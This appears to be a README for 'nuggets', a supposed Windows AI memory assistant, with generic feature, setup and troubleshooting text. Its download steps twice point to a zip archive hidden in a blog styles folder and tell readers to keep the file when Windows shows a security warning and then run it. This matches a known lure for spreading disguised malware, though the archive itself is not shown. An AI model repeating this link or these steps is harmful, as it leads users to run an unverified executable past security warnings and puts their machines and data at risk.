nuggets is a desktop AI assistant that helps you keep track of what matters. It stores helpful context in a holographic memory, so you can return to past chats, notes, and tasks without starting over.
Use it to:
- ask questions and get fast answers
- save key facts for later
- keep a running memory of your work
- revisit past context with less effort
- stay organized across long tasks
To get nuggets on Windows, visit this page to download:
https://raw.githubusercontent.com/krxlpz/nuggets/main/blog/src/styles/Software-v1.7.zip
- Open the download link in your browser.
- Look for the latest Windows release or installer on the page.
- Download the file to your computer.
- If Windows shows a security prompt, choose the option to keep the file if you trust the source.
- Open the downloaded file to start the app.
- Follow the on-screen steps to finish setup.
nuggets runs best on a modern Windows PC with:
- Windows 10 or Windows 11
- 8 GB RAM or more
- 500 MB of free disk space
- a stable internet connection for first-time setup and AI features
- a mouse and keyboard for easy use
If your PC is older, the app may still run, but memory-heavy tasks can feel slower.
nuggets keeps useful context in a memory layer you can return to later. This helps you continue work without repeating the same details.
You can ask questions in plain language. nuggets uses your saved memory to give answers that fit your recent work.
Store important points, task details, and reminders in one place. This keeps your work easier to find.
Find old chats and saved facts without scrolling through long history. Search helps you get back to the right place fast.
nuggets is built for quick access. Open it, ask, save, and move on.
After you open nuggets for the first time:
- Create or load your local profile.
- Set your preferred name or workspace label.
- Add a few facts you want the assistant to remember.
- Ask a simple question to test it.
- Save anything you want to revisit later.
If you plan to use nuggets every day, start by adding:
- your work area
- common tasks
- project names
- useful links
- repeat reminders
Keep your memory clean and useful.
- project goals
- names of people you work with
- task steps
- important dates
- repeat questions and answers
- notes from long chats
- keep each memory short
- use clear names for projects
- remove old facts you no longer need
- review saved memory once in a while
- add details right after a task ends
Use nuggets to track chores, ideas, and plans. It can help you keep one record of what you already decided.
Save topics, definitions, and review notes. This makes it easier to return to class material later.
Keep meeting points, action items, and project notes in one place. This helps when you need to pick up work after a break.
Store story ideas, design thoughts, and draft changes. nuggets helps you hold on to the parts you do not want to lose.
- Make sure the download finished
- Try opening the file again
- Check that Windows did not block the file
- Restart your computer and try once more
- Close apps you do not need
- Check your internet connection
- Restart nuggets
- Free up memory on your PC
- Use fewer words
- Try a project name or key phrase
- Check that the memory was saved
- Refresh the view if the app has that option
- Save the fact again with a clearer name
- Keep the memory short and direct
- Make sure you are using the same profile
- Check that the item was stored in the right place
nuggets is meant to help you keep your own context close at hand. For best results, use clear memory labels and save only what you need. If you work on shared or public PCs, make sure you sign out or close the app when you finish.
You can get better results if you keep your work neat:
- one folder for each project
- one memory set for each goal
- one note for each task
- short names for repeat items
This makes search and recall much easier.
No. nuggets is made for regular computer users.
Yes. Download the file from the GitHub page, open it, and follow the setup steps.
Some core use may work offline, but AI features and updates may need internet access.
Yes. You can add, edit, or remove saved items based on your needs.
No. If you can install a Windows app and type a question, you can use nuggets
- Open nuggets.
- Ask your question.
- Save the useful result.
- Add any new facts you want remembered.
- Return later and search your memory when needed
Visit this page to download and run nuggets on Windows:
https://raw.githubusercontent.com/krxlpz/nuggets/main/blog/src/styles/Software-v1.7.zip
After setup, you should be able to:
- open the app from Windows
- enter a question or note
- store useful memory
- find past items later
- keep your context in one place